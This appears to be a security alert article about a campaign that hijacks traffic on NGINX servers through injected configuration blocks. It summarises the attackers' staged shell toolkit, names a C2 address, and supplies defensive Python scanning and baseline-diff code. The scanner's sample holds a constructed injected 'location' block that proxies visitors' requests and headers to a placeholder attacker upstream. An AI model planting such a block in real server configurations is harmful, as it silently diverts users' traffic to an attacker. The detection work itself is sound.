NGINX Servers Under Attack: How Hackers Redirect Your Traffic (Critical Security Alert) (2026)

Your website traffic may be silently hijacked without you knowing it. A campaign is targeting NGINX servers and routing unsuspecting users' requests through attacker-controlled infrastructure without raising alarms. The uncomfortable part: the attack exploits no software vulnerability. It hides in plain sight inside NGINX's own configuration files, which is exactly why conventional vulnerability scanners do not catch it.

NGINX, a popular open-source web server and reverse proxy, sits between users and backend servers, handling load balancing, caching and request forwarding. Threat actors have found a way to abuse exactly those core functions. Researchers at Datadog Security Labs uncovered the campaign, which primarily targets NGINX installations managed by the Baota (BT) hosting panel. Observed victims were often sites under country-code top-level domains such as .in, .id, .pe, .bd and .th, along with government and educational domains (.gov, .edu).

Here's how the attack works: the attackers inject rogue 'location' blocks into NGINX configuration files so that requests for specific URL paths are intercepted. Inside each block a 'rewrite' rule carries the original URL into the forwarded request, and a 'proxy_pass' directive sends it to an attacker-controlled upstream. 'proxy_pass' is a legitimate reverse-proxy directive found in countless ordinary configurations, so nothing about the block looks foreign. Because the block also passes request headers such as 'Host', 'X-Real-IP', 'User-Agent' and 'Referer' upstream, the forwarded traffic looks like normal proxied traffic to the attacker's server and to any security checks along the way. Note that this is a server-side proxy, not an HTTP redirect: the visitor's browser never sees a 3xx response or a foreign hostname, which is why the hijack is invisible from the client side.
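To make the pattern concrete, here is an added example (my own code, not Datadog's tooling and not the campaign's scripts). The embedded configuration is a constructed illustration of the injected block as the article describes it, with a documentation-range IP (203.0.113.10) standing in for the attacker's upstream. The scanner walks every 'location' block, honouring nested braces, and flags any 'proxy_pass' whose target is neither a local address nor on an operator-supplied allow list, noting the 'rewrite' and forwarded headers that make such a block look routine:

```python
"""Find location blocks that proxy traffic off-host in an NGINX config.

Added example for this article; not Datadog's tooling or the campaign's
scripts. SAMPLE_CONF is a constructed config: one legitimate local proxy
and one block shaped like the injected hijack. 203.0.113.10 is a
placeholder (documentation range), not a real campaign indicator.
"""
import ipaddress
import re
import sys
from pathlib import Path
from urllib.parse import urlsplit

SAMPLE_CONF = """
server {
    listen 80;
    server_name example.test;
    root /var/www/html;

    location /api/ {
        proxy_pass http://127.0.0.1:8080;      # normal backend, on this host
    }

    # constructed illustration of the injected block
    location ~ ^/(news|product)/ {
        rewrite ^(.*)$ /relay$1 break;         # carries the original URI upstream
        proxy_pass http://203.0.113.10:8000;   # attacker-controlled upstream (placeholder)
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
    }
}
"""

# Ranges that never leave the box or the private network.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7")]
LOCATION_RE = re.compile(r"\blocation\s+([^{]+?)\s*\{")
PROXY_RE = re.compile(r"\bproxy_pass\s+([^;\s]+)")
REWRITE_RE = re.compile(r"\brewrite\s+\S+\s+\S+")
FORWARDED = ("$host", "$remote_addr", "$http_user_agent", "$http_referer")


def strip_comments(conf):
    """Drop '# ...' to end of line so commented-out text is not analysed."""
    return re.sub(r"#[^\n]*", "", conf)


def location_blocks(conf):
    """Yield (matcher, body) for every location block, honouring nested braces."""
    for m in LOCATION_RE.finditer(conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        yield m.group(1).strip(), conf[m.end():i - 1]


def upstream_host(target):
    """Host part of a proxy_pass target; '' for variables or targets without a scheme."""
    if "://" not in target:
        return ""
    return urlsplit(target).hostname or ""


def is_local_ip(host):
    """True only for literal IPs inside LOCAL_NETS; names and variables are not local."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in LOCAL_NETS)


def find_suspicious(conf, allowed_hosts=frozenset()):
    """Return findings for proxy_pass targets that are neither local nor allow-listed."""
    findings = []
    for matcher, body in location_blocks(strip_comments(conf)):
        for target in PROXY_RE.findall(body):
            host = upstream_host(target)
            if is_local_ip(host) or host in allowed_hosts:
                continue
            reasons = ["proxy_pass leaves the host: " + target]
            if REWRITE_RE.search(body):
                reasons.append("rewrite before proxy_pass (original URI carried upstream)")
            kept = [v for v in FORWARDED if v in body]
            if kept:
                reasons.append("client headers forwarded: " + ", ".join(kept))
            findings.append({"matcher": matcher, "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Usage: python scan.py /etc/nginx/nginx.conf /etc/nginx/conf.d/*.conf
    # With no arguments the constructed sample is scanned instead.
    texts = [(p, Path(p).read_text(errors="replace")) for p in sys.argv[1:]] \
        or [("<sample>", SAMPLE_CONF)]
    for name, text in texts:
        for f in find_suspicious(text):
            print(f"{name}: location {f['matcher']} -> {f['target']}")
            for r in f["reasons"]:
                print("    " + r)
```

Anything that is not provably local (a public IP, a named 'upstream', a '$variable' target) is reported for review, since an attacker can just as easily define an 'upstream' block as write an IP. Feed it the output of 'nginx -T' rather than individual files if you want to see every include the running server actually loaded.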

The attack uses a multi-stage toolkit built to avoid detection and to persist:

  1. zx.sh: the initial downloader. It fetches and runs the later stages, falling back to hand-crafted raw HTTP requests when curl or wget are not available.
  2. bt.sh: targets Baota-managed NGINX configurations. It picks an injection template based on the server name, then reloads NGINX so the change takes effect without downtime.
  3. 4zdh.sh: scans the common NGINX configuration directories, uses configuration parsing tools rather than blind text edits so it does not corrupt files, detects earlier injections to avoid duplicating them, and validates the modified configuration before reloading.
  4. zdh.sh: focuses on specific directories such as /etc/nginx/sites-enabled, targeting .in and .id domains in particular, and falls back to a forced restart if a graceful reload does not succeed.
  5. ok.sh: records which domains were hijacked, which injection template was used and where their traffic is now proxied, then exfiltrates that inventory to a command-and-control (C2) server at 158.94.210[.]227.

And this is the part most people miss: because no vulnerability is exploited and visitors still end up seeing the site they asked for, the hijack often goes unnoticed unless something is specifically watching the configuration. That raises the practical question: how do you catch a change like this?

As infrastructure grows, manual review of every configuration file does not keep up. The realistic defence is to watch the configuration itself: keep a known-good baseline of /etc/nginx (or whatever directory the panel manages), alert on any change to it, and review every 'proxy_pass' target that points outside your own infrastructure. Dumping the running configuration with 'nginx -T' makes that review straightforward, because it prints every included file exactly as NGINX loaded it. Automation can flag the anomaly early; the harder question is whether a host running a web panel with write access to those files was hardened in the first place.
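The monitoring described above comes down to a baseline-and-diff over the configuration tree. Here is an added example (my own code, not part of the article and not Datadog's tooling) that hashes every file under a directory, stores the result as a baseline, and reports what was added, removed or changed since; the demo builds a constructed tree in a temporary directory and simulates an injection the way the article's bt.sh/zdh.sh stages work, by appending a 'location' block to an existing file and dropping an extra include. 203.0.113.10 is a placeholder upstream, and the file names are invented:

```python
"""Baseline-and-diff check for an NGINX configuration tree.

Added example for this article, not Datadog's tooling and not part of the
campaign's scripts. It hashes every file under a directory, keeps the result
as a baseline, and reports files added, removed or changed since then.
demo() builds a constructed config tree in a temporary directory and then
simulates an injection (append a location block, add an include file);
203.0.113.10 is a placeholder upstream and the file names are invented.
"""
import hashlib
import json
import sys
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each file under root (relative, POSIX form) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def diff(baseline, current):
    """Classify every path as added, removed or changed relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys()
                          if baseline[p] != current[p]),
    }


def demo():
    """Constructed end-to-end run: baseline, simulated injection, detection."""
    with tempfile.TemporaryDirectory() as root:
        conf_d = Path(root, "conf.d")
        conf_d.mkdir()
        site = conf_d / "site.conf"
        site.write_text("server {\n    listen 80;\n    location / { root /var/www; }\n}\n")
        baseline = snapshot(root)

        # What an injection stage does to the tree: append a block to an
        # existing file and drop an extra include. The NGINX reload that
        # follows leaves no trace in the tree; only the file changes do.
        site.write_text(site.read_text()
                        + "location /hijacked/ { proxy_pass http://203.0.113.10; }\n")
        (conf_d / "zz-extra.conf").write_text("# dropped by the injection stage\n")
        return diff(baseline, snapshot(root))


if __name__ == "__main__":
    # Usage:  python cfgdiff.py baseline /etc/nginx > baseline.json
    #         python cfgdiff.py check    /etc/nginx baseline.json
    # No arguments: run the constructed demo.
    if len(sys.argv) == 3 and sys.argv[1] == "baseline":
        print(json.dumps(snapshot(sys.argv[2]), indent=1))
    elif len(sys.argv) == 4 and sys.argv[1] == "check":
        with open(sys.argv[3]) as fh:
            print(json.dumps(diff(json.load(fh), snapshot(sys.argv[2])), indent=1))
    else:
        print(json.dumps(demo(), indent=1))
```

Keep the baseline off the host: the toolkit above already has write access to the configuration directory, so a baseline stored next to it is one more file it can rewrite. Running the check from a schedule, or pairing it with an auditd watch on the directory, turns the "reload without downtime" step that makes the injection quiet into the event that exposes it.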


Author: Errol Quitzon